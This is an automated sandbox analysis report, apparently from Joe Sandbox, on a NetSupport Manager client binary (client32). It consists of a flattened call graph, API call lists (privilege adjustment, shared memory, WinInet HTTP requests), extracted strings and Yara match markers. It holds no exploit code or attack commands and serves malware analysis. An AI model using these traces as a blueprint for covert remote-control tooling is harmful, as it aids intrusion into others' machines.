6bed1bfd 98442->98534 98533 6bed6e37 13 API calls 2 library calls 98443->98533 98448 6bed59bd GetCurrentThreadId 98448->98430 98450 6bed58ea 98517 6bedef5b 96 API calls 3 library calls 98450->98517 98451 6bed58e3 98516 6bed6dfa 29 API calls _free 98451->98516 98454 6bed58ef 98456 6bed5903 98454->98456 98518 6bedecd4 97 API calls 5 library calls 98454->98518 98515 6bed609d HeapDestroy 98455->98515 98462 6bed5908 98456->98462 98520 6bed9b09 26 API calls _free 98456->98520 98459 6bed58f8 98459->98456 98519 6bed5c32 EncodePointer __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 98459->98519 98460 6bed5918 98460->98451 98462->98430 98463->98419 98465 6bed713b 98464->98465 98466 6bed7144 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 98464->98466 98541 6bed6dfa 29 API calls _free 98465->98541 98469 6bed718e TlsAlloc 98466->98469 98468 6bed7140 98468->98427 98471 6bed729d 98469->98471 98472 6bed71dc TlsSetValue 98469->98472 98471->98427 98472->98471 98473 6bed71ed 98472->98473 98542 6bed5b5e __initp_misc_winsig EncodePointer EncodePointer __init_pointers 98473->98542 98475 6bed71f2 EncodePointer EncodePointer EncodePointer EncodePointer 98543 6bedf32a InitializeCriticalSectionAndSpinCount 98475->98543 98477 6bed7231 98478 6bed7298 98477->98478 98479 6bed7235 DecodePointer 98477->98479 98545 6bed6dfa 29 API calls _free 98478->98545 98481 6bed724a 98479->98481 98481->98478 98482 6bedd3f5 __calloc_crt 25 API calls 98481->98482 98483 6bed7260 98482->98483 98483->98478 98484 6bed7268 DecodePointer 98483->98484 98485 6bed7279 98484->98485 98485->98478 98486 6bed727d 98485->98486 98544 6bed6e37 13 API calls 2 library calls 98486->98544 98488 6bed7285 GetCurrentThreadId 98488->98471 98491 6bedf032 WideCharToMultiByte 98489->98491 98494 6bed58d5 98489->98494 98492 6bedf09f FreeEnvironmentStringsW 98491->98492 98493 6bedf067 98491->98493 98492->98494 98546 6bedd3b0 62 API calls _malloc 98493->98546 98502 6bed98c4 GetStartupInfoW 98494->98502 98496 
6bedf06d 98496->98492 98497 6bedf075 WideCharToMultiByte 98496->98497 98498 6bedf087 98497->98498 98499 6bedf093 FreeEnvironmentStringsW 98497->98499 98500 6bed1bfd _free 25 API calls 98498->98500 98499->98494 98501 6bedf08f 98500->98501 98501->98499 98503 6bedd3f5 __calloc_crt 25 API calls 98502->98503 98512 6bed98e2 98503->98512 98504 6bed58df 98504->98450 98504->98451 98505 6bed9a8d GetStdHandle 98508 6bed9a57 98505->98508 98506 6bedd3f5 __calloc_crt 25 API calls 98506->98512 98507 6bed9af1 SetHandleCount 98507->98504 98508->98505 98508->98507 98509 6bed9a9f GetFileType 98508->98509 98513 6bed9ac5 InitializeCriticalSectionAndSpinCount 98508->98513 98509->98508 98510 6bed9a0e InitializeCriticalSectionAndSpinCount 98510->98504 98514 6bed99d7 98510->98514 98511 6bed9a03 GetFileType 98511->98510 98511->98514 98512->98504 98512->98506 98512->98508 98512->98514 98513->98504 98513->98508 98514->98508 98514->98510 98514->98511 98515->98430 98516->98455 98517->98454 98518->98459 98519->98456 98520->98460 98521->98421 98522->98433 98523->98437 98524->98424 98525->98430 98526->98426 98530 6bedd3fe 98527->98530 98529 6bed5991 98529->98430 98529->98434 98530->98529 98531 6bedd41c Sleep 98530->98531 98547 6beda082 98530->98547 98532 6bedd431 98531->98532 98532->98529 98532->98530 98533->98448 98535 6bed1c08 HeapFree 98534->98535 98536 6bed1c31 __dosmaperr 98534->98536 98535->98536 98537 6bed1c1d 98535->98537 98536->98430 98558 6bed60f9 25 API calls __getptd_noexit 98537->98558 98539 6bed1c23 GetLastError 98539->98536 98540->98430 98541->98468 98542->98475 98543->98477 98544->98488 98545->98471 98546->98496 98548 6beda08e 98547->98548 98552 6beda0a9 98547->98552 98549 6beda09a 98548->98549 98548->98552 98556 6bed60f9 25 API calls __getptd_noexit 98549->98556 98551 6beda0bc RtlAllocateHeap 98551->98552 98554 6beda0e3 98551->98554 98552->98551 98552->98554 98557 6bed622a DecodePointer 98552->98557 98553 6beda09f 98553->98530 98554->98530 98556->98553 98557->98552 98558->98539 
98559 111031c0 GetTickCount EnterCriticalSection GetTickCount 98560 11103213 98559->98560 98561 11103208 98559->98561 98563 11103232 98560->98563 98564 1110328a GetTickCount LeaveCriticalSection 98560->98564 98562 11142790 std::_Mutex::_Mutex 21 API calls 98561->98562 98562->98560 98567 11103250 GetTickCount LeaveCriticalSection 98563->98567 98596 110290c0 265 API calls 2 library calls 98563->98596 98565 111032b0 EnterCriticalSection 98564->98565 98566 111032a2 98564->98566 98571 111032d9 98565->98571 98570 11142790 std::_Mutex::_Mutex 21 API calls 98566->98570 98568 11103273 98567->98568 98569 11103268 98567->98569 98574 11142790 std::_Mutex::_Mutex 21 API calls 98569->98574 98575 111032ad 98570->98575 98576 111032e3 98571->98576 98577 11103304 98571->98577 98574->98568 98575->98565 98579 1110337e LeaveCriticalSection 98576->98579 98580 111032ee 98576->98580 98578 1110c4b0 std::_Mutex::_Mutex 265 API calls 98577->98578 98581 1110330e 98578->98581 98597 110290c0 265 API calls 2 library calls 98580->98597 98584 11103327 98581->98584 98598 110ee9b0 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 98581->98598 98587 11103334 98584->98587 98588 1110334b 98584->98588 98585 1110337b 98585->98579 98599 110290c0 265 API calls 2 library calls 98587->98599 98600 1113a660 266 API calls 3 library calls 98588->98600 98592 11103360 98601 11101b40 67 API calls std::ios_base::_Ios_base_dtor 98592->98601 98594 1110336f 98595 11142790 std::_Mutex::_Mutex 21 API calls 98594->98595 98595->98585 98598->98584 98600->98592 98601->98594 98602 11112c20 98603 111416c0 std::_Mutex::_Mutex 90 API calls 98602->98603 98604 11112c3e 98603->98604 98605 11112c65 98604->98605 98607 11112c48 98604->98607 98611 11141440 std::_Mutex::_Mutex 90 API calls 98604->98611 98606 11112c74 CoInitialize CoCreateInstance 98605->98606 98605->98607 98608 11112ca4 LoadLibraryA 98606->98608 98609 11112c99 98606->98609 98610 1115e3e1 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98607->98610 98608->98609 98612 11112cc0 GetProcAddress 98608->98612 98616 11112d81 CoUninitialize 98609->98616 98617 11112d87 98609->98617 98613 11112c56 98610->98613 98611->98605 98614 11112cd0 SHGetSettings 98612->98614 98615 11112ce4 FreeLibrary 98612->98615 98614->98615 98615->98609 98616->98617 98618 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98617->98618 98619 11112d96 98618->98619 98620 111700e5 98621 11167e95 __getptd 66 API calls 98620->98621 98622 11170102 _LcidFromHexString 98621->98622 98623 1117010f GetLocaleInfoA 98622->98623 98624 11170136 98623->98624 98625 11170142 98623->98625 98627 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98624->98627 98643 11160d5e 85 API calls 2 library calls 98625->98643 98629 111702b2 98627->98629 98628 1117014e 98630 11170158 GetLocaleInfoA 98628->98630 98641 11170188 _LangCountryEnumProc@4 _strlen 98628->98641 98630->98624 98631 11170177 98630->98631 98644 11160d5e 85 API calls 2 library calls 98631->98644 98632 111701fb GetLocaleInfoA 98632->98624 98634 1117021e 98632->98634 98646 11160d5e 85 API calls 2 library calls 98634->98646 98636 11170231 _strlen 98636->98624 98648 1117008a GetLocaleInfoW _GetPrimaryLen _strlen 98636->98648 98637 11170182 98637->98641 98645 1115fe64 85 API calls 2 library calls 98637->98645 98639 11170229 98639->98624 98639->98636 98647 11160d5e 85 API calls 2 library calls 98639->98647 98641->98624 98641->98632 98643->98628 98644->98637 98645->98641 98646->98639 98647->98636 98648->98624 98649 1102fb50 GetWindowRect 98650 1102fdc7 98649->98650 98651 1102fbc4 98649->98651 98652 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 98650->98652 98651->98650 98653 1102fbcc GetWindowLongA 98651->98653 98654 1102fde4 98652->98654 98653->98650 98655 1102fbe6 GetClassNameA 98653->98655 98656 1102fc00 98655->98656 98656->98650 98657 1102fc2d 
GetWindowThreadProcessId OpenProcess 98656->98657 98657->98650 98658 1102fc59 98657->98658 98679 11025980 LoadLibraryA 98658->98679 98660 1102fc64 98680 110259b0 98660->98680 98662 1102fc83 98663 1102fdaf CloseHandle 98662->98663 98665 110ce2d0 265 API calls 98662->98665 98663->98650 98664 1102fdc0 FreeLibrary 98663->98664 98664->98650 98666 1102fc9d 98665->98666 98690 110cddf0 86 API calls std::_Mutex::_Mutex 98666->98690 98668 1102fcb1 98669 1102fda0 98668->98669 98670 1102fcbe 98668->98670 98677 1102fcfb 98668->98677 98671 110ce380 265 API calls 98669->98671 98672 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 98670->98672 98671->98663 98673 1102fccc 98672->98673 98674 11142790 std::_Mutex::_Mutex 21 API calls 98673->98674 98675 1102fcf0 98674->98675 98691 111253c0 276 API calls 4 library calls 98675->98691 98677->98669 98678 11142790 std::_Mutex::_Mutex 21 API calls 98677->98678 98678->98675 98679->98660 98681 110259be GetProcAddress 98680->98681 98682 110259cf 98680->98682 98681->98682 98683 110259e8 98682->98683 98684 110259dc K32GetProcessImageFileNameA 98682->98684 98686 110259ee GetProcAddress 98683->98686 98687 110259ff 98683->98687 98684->98683 98685 11025a21 98684->98685 98685->98662 98686->98687 98688 11025a06 98687->98688 98689 11025a17 SetLastError 98687->98689 98688->98662 98689->98685 98690->98668 98691->98669 98692 1102dff0 98693 1102e033 98692->98693 98694 1110c4b0 std::_Mutex::_Mutex 265 API calls 98693->98694 98695 1102e03a 98694->98695 98696 1113ee00 267 API calls 98695->98696 98697 1102e05a 98695->98697 98696->98697 98698 1113ef50 86 API calls 98697->98698 98699 1102e084 98698->98699 98700 1102e0b1 98699->98700 98701 11080cc0 86 API calls 98699->98701 98703 1113ef50 86 API calls 98700->98703 98702 1102e096 98701->98702 98704 11080cc0 86 API calls 98702->98704 98705 1102e0da 98703->98705 98704->98700 98706 1115f4c7 std::_Mutex::_Mutex 79 API calls 98705->98706 98710 1102e0e7 98705->98710 98706->98710 98707 1102e116 98708 1102e188 98707->98708 
98709 1102e16f GetSystemMetrics 98707->98709 98714 1102e1a2 CreateEventA 98708->98714 98709->98708 98711 1102e17e 98709->98711 98710->98707 98712 11141440 std::_Mutex::_Mutex 90 API calls 98710->98712 98713 11142790 std::_Mutex::_Mutex 21 API calls 98711->98713 98712->98707 98713->98708 98715 1102e1b5 98714->98715 98716 1102e1c9 98714->98716 99678 110290c0 265 API calls 2 library calls 98715->99678 98718 1110c4b0 std::_Mutex::_Mutex 265 API calls 98716->98718 98719 1102e1d0 98718->98719 98720 1102e1f0 98719->98720 98721 1110d180 426 API calls 98719->98721 98722 1110c4b0 std::_Mutex::_Mutex 265 API calls 98720->98722 98721->98720 98723 1102e204 98722->98723 98724 1110d180 426 API calls 98723->98724 98725 1102e224 98723->98725 98724->98725 98726 1110c4b0 std::_Mutex::_Mutex 265 API calls 98725->98726 98727 1102e2a3 98726->98727 98728 1102e2d3 98727->98728 98729 110605c0 301 API calls 98727->98729 98730 1110c4b0 std::_Mutex::_Mutex 265 API calls 98728->98730 98729->98728 98731 1102e2ed 98730->98731 98732 1102e312 FindWindowA 98731->98732 98733 11060230 293 API calls 98731->98733 98735 1102e467 98732->98735 98736 1102e34b 98732->98736 98733->98732 98737 11060a10 268 API calls 98735->98737 98736->98735 98739 1102e363 GetWindowThreadProcessId 98736->98739 98738 1102e479 98737->98738 98740 11060a10 268 API calls 98738->98740 98741 11142790 std::_Mutex::_Mutex 21 API calls 98739->98741 98742 1102e485 98740->98742 98743 1102e389 OpenProcess 98741->98743 98744 11060a10 268 API calls 98742->98744 98743->98735 98746 1102e3a9 98743->98746 98745 1102e491 98744->98745 98747 1102e4a8 98745->98747 98748 1102e49f 98745->98748 99679 11093b90 105 API calls 98746->99679 99079 11141cb0 98747->99079 99680 110279a0 119 API calls 2 library calls 98748->99680 98751 1102e3c8 98754 11142790 std::_Mutex::_Mutex 21 API calls 98751->98754 98752 1102e4a4 98752->98747 98756 1102e3dc 98754->98756 98755 1102e4b7 99094 11141160 ExpandEnvironmentStringsA 98755->99094 98757 1102e41b CloseHandle 
FindWindowA 98756->98757 98758 11142790 std::_Mutex::_Mutex 21 API calls 98756->98758 98759 1102e443 GetWindowThreadProcessId 98757->98759 98760 1102e457 98757->98760 98762 1102e3ee SendMessageA WaitForSingleObject 98758->98762 98759->98760 98763 11142790 std::_Mutex::_Mutex 21 API calls 98760->98763 98762->98757 98765 1102e40e 98762->98765 98766 1102e464 98763->98766 98768 11142790 std::_Mutex::_Mutex 21 API calls 98765->98768 98766->98735 98767 1113f5d0 std::_Mutex::_Mutex 8 API calls 98769 1102e4da 98767->98769 98770 1102e418 98768->98770 98771 1102e5b1 98769->98771 99107 110623a0 98769->99107 98770->98757 99122 110270d0 98771->99122 98775 110b69b0 std::_Mutex::_Mutex 9 API calls 98777 1102e5d6 std::_Mutex::_Mutex 98779 1102a220 std::_Mutex::_Mutex 145 API calls 98777->98779 98788 1102e5f1 98777->98788 98782 1102e5ea 98779->98782 98785 1102a220 std::_Mutex::_Mutex 145 API calls 98782->98785 98785->98788 99142 11027de0 98788->99142 99080 11140f70 std::_Mutex::_Mutex 265 API calls 99079->99080 99081 11141ccb wsprintfA 99080->99081 99082 11140f70 std::_Mutex::_Mutex 265 API calls 99081->99082 99083 11141ce7 wsprintfA 99082->99083 99084 1113f5d0 std::_Mutex::_Mutex 8 API calls 99083->99084 99085 11141d04 99084->99085 99086 11141d30 99085->99086 99087 1113f5d0 std::_Mutex::_Mutex 8 API calls 99085->99087 99088 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99086->99088 99089 11141d19 99087->99089 99090 11141d3c 99088->99090 99089->99086 99091 11141d20 99089->99091 99090->98755 99092 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99091->99092 99093 11141d2c 99092->99093 99093->98755 99095 11141197 99094->99095 99096 111411b4 std::_Mutex::_Mutex 99095->99096 99097 111411ce 99095->99097 99106 111411a4 99095->99106 99100 111411c5 GetModuleFileNameA 99096->99100 99098 11140f70 std::_Mutex::_Mutex 265 API calls 99097->99098 99101 111411d4 99098->99101 99099 1113e630 std::_Mutex::_Mutex 265 API calls 99102 11141228 

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 1109C4F0: GetCurrentProcess.KERNEL32(000F01FF,?,1102FA03,00000000,00000000,00080000,70C59CC5,00080000,00000000,00000000), ref: 1109C51D
                                                                                                                    • Part of subcall function 1109C4F0: OpenProcessToken.ADVAPI32(00000000), ref: 1109C524
                                                                                                                    • Part of subcall function 1109C4F0: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C535
                                                                                                                    • Part of subcall function 1109C4F0: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C559
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,70C59CC5,00080000,00000000,00000000), ref: 1109D2D5
                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D2EE
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D2F9
                                                                                                                  • GetVersionExA.KERNEL32(?), ref: 1109D310
                                                                                                                  • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D37E
                                                                                                                  • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D393
                                                                                                                  • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D3A4
                                                                                                                  • CreateFileMappingA.KERNEL32(000000FF,1102FA03,00000004,00000000,?,?), ref: 1109D3E0
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D3ED
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D416
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D423
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D440
                                                                                                                  • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 1109D45E
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D489
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D496
                                                                                                                    • Part of subcall function 1109C460: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D32E), ref: 1109C468
                                                                                                                    • Part of subcall function 1109C4A0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C4B4
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D4C2
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D58B
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D598
                                                                                                                  • _memset.LIBCMT ref: 1109D5B0
                                                                                                                  • GetTickCount.KERNEL32 ref: 1109D5B8
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 1109D664
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D67F
                                                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D6CB
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D6D4
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109D6DB
                                                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D710
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D719
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109D720
                                                                                                                  • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D756
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D75F
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109D766
                                                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D79B
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D7AA
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109D7AD
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D7D5
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D7E2
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1109D813
                                                                                                                  • CreateThread.KERNEL32(00000000,00002000,Function_0009CDD0,00000000,00000000,00000030), ref: 1109D82D
                                                                                                                  • ResetEvent.KERNEL32(?), ref: 1109D85C
                                                                                                                  • ResetEvent.KERNEL32(?), ref: 1109D862
                                                                                                                  • ResetEvent.KERNEL32(?), ref: 1109D868
                                                                                                                  • SetEvent.KERNEL32(?), ref: 1109D86E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                  • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(WinInet.dll,70C59CC5,76E823A0,?,00000000), ref: 11029235
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292CF
                                                                                                                  • InternetCloseHandle.WININET(000000FF), ref: 110292DD
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110292E3
                                                                                                                  • _malloc.LIBCMT ref: 11029307
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029321
                                                                                                                  • GetLastError.KERNEL32 ref: 11029342
                                                                                                                  • _free.LIBCMT ref: 1102934E
                                                                                                                  • _malloc.LIBCMT ref: 11029357
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029371
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293AB
                                                                                                                  • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293CA
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110293D4
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110293E1
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110293EB
                                                                                                                  • _free.LIBCMT ref: 110293F5
                                                                                                                    • Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
                                                                                                                    • Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029475
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 1102948E
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294A1
                                                                                                                  • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294BE
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294DA
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110294F3
                                                                                                                  • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029519
                                                                                                                  • HttpOpenRequestA.WININET(?,GET,111955F8,00000000,00000000,00000000,8040F000,00000000), ref: 1102953F
                                                                                                                  • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102956D
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 110296D3
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110297A0
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110297F2
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029809
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 1102981A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$CloseConnectHandleHeapHttpLoadRequest
                                                                                                                  • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                  • API String ID: 2589145992-913974648
                                                                                                                  • Opcode ID: 0750f3ca7a4feddd9dd4cdd24e005e8028da560cd2644abbe05804cbdb6a94c3
                                                                                                                  • Instruction ID: 1a6f29b930c56522642f3e0528693d97e2c9ce6eee6fc69bea7c9705341dbda6
                                                                                                                  • Opcode Fuzzy Hash: 0750f3ca7a4feddd9dd4cdd24e005e8028da560cd2644abbe05804cbdb6a94c3
                                                                                                                  • Instruction Fuzzy Hash: 3C128EB0D002299BDB11CFA9CC88A9EFBF8FF89344F60856AE555F7240EB745941CB61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6BEB2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6BEB2ACB
                                                                                                                    • Part of subcall function 6BEB2A90: _strrchr.LIBCMT ref: 6BEB2ADA
                                                                                                                    • Part of subcall function 6BEB2A90: _strrchr.LIBCMT ref: 6BEB2AEA
                                                                                                                    • Part of subcall function 6BEB2A90: wsprintfA.USER32 ref: 6BEB2B05
                                                                                                                    • Part of subcall function 6BECDBD0: _malloc.LIBCMT ref: 6BECDBE9
                                                                                                                    • Part of subcall function 6BECDBD0: wsprintfA.USER32 ref: 6BECDC04
                                                                                                                    • Part of subcall function 6BECDBD0: _memset.LIBCMT ref: 6BECDC27
                                                                                                                  • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6BEC7057
                                                                                                                  • InitializeCriticalSection.KERNEL32(6BEFB898), ref: 6BEC70DF
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BEC70EF
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BEC7115
                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BEC713B
                                                                                                                  • WSAStartup.WSOCK32(00000101,6BEFB91A), ref: 6BEC7167
                                                                                                                  • _malloc.LIBCMT ref: 6BEC71A3
                                                                                                                    • Part of subcall function 6BED1B69: __FF_MSGBANNER.LIBCMT ref: 6BED1B82
                                                                                                                    • Part of subcall function 6BED1B69: __NMSG_WRITE.LIBCMT ref: 6BED1B89
                                                                                                                    • Part of subcall function 6BED1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6BEDD3C1,6BED6E81,00000001,6BED6E81,?,6BEDF447,00000018,6BEF7738,0000000C,6BEDF4D7), ref: 6BED1BAE
                                                                                                                  • _memset.LIBCMT ref: 6BEC71D3
                                                                                                                  • _calloc.LIBCMT ref: 6BEC7214
                                                                                                                  • _malloc.LIBCMT ref: 6BEC728B
                                                                                                                  • _memset.LIBCMT ref: 6BEC72C1
                                                                                                                  • _malloc.LIBCMT ref: 6BEC72CD
                                                                                                                  • _memset.LIBCMT ref: 6BEC7303
                                                                                                                  • GetTickCount.KERNEL32 ref: 6BEC7361
                                                                                                                  • CreateThread.KERNEL32(00000000,00004000,6BEC6BA0,00000000,00000000,6BEFBACC), ref: 6BEC737E
                                                                                                                  • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6BEC73AC
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\netsupport\client\Support\,00000104), ref: 6BEC7430
                                                                                                                  • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\ProgramData\netsupport\client\Support\pci.ini), ref: 6BEC74B0
                                                                                                                  • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6BEC74C0
                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6BEC7566
                                                                                                                  • timeBeginPeriod.WINMM(00000001), ref: 6BEC7573
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2631430267.000000006BEB1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6BEB0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_6beb0000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                                  • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/v$494126$C:\ProgramData\netsupport\client\Support\$C:\ProgramData\netsupport\client\Support\pci.ini$General$HTCTL32$NSM301071$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                                  • API String ID: 3160247386-1731328905
                                                                                                                  • Opcode ID: 5e195d4eaf3ee6b34b1f85abd852f893f964bec2aa99e4aba348eb0690c33ead
                                                                                                                  • Instruction ID: 5dc7c4bbd0ee9da0706cb22419ea34e3a6b2a00002eaa64c4d1ee45ab90922f9
                                                                                                                  • Opcode Fuzzy Hash: 5e195d4eaf3ee6b34b1f85abd852f893f964bec2aa99e4aba348eb0690c33ead
                                                                                                                  • Instruction Fuzzy Hash: 32D1D3B0E00354AFDB109F78AD81A177BECFB99348B704469F919D7341E739E8518BA2
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 11141240: GetLastError.KERNEL32(?,00000000,754D795C,00000000), ref: 11141275
                                                                                                                    • Part of subcall function 11141240: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,754D795C,00000000), ref: 11141285
                                                                                                                  • _fgets.LIBCMT ref: 11061402
                                                                                                                  • _strpbrk.LIBCMT ref: 11061469
                                                                                                                  • _fgets.LIBCMT ref: 1106156C
                                                                                                                  • _strpbrk.LIBCMT ref: 110615E3
                                                                                                                  • __wcstoui64.LIBCMT ref: 110615FC
                                                                                                                  • _fgets.LIBCMT ref: 11061675
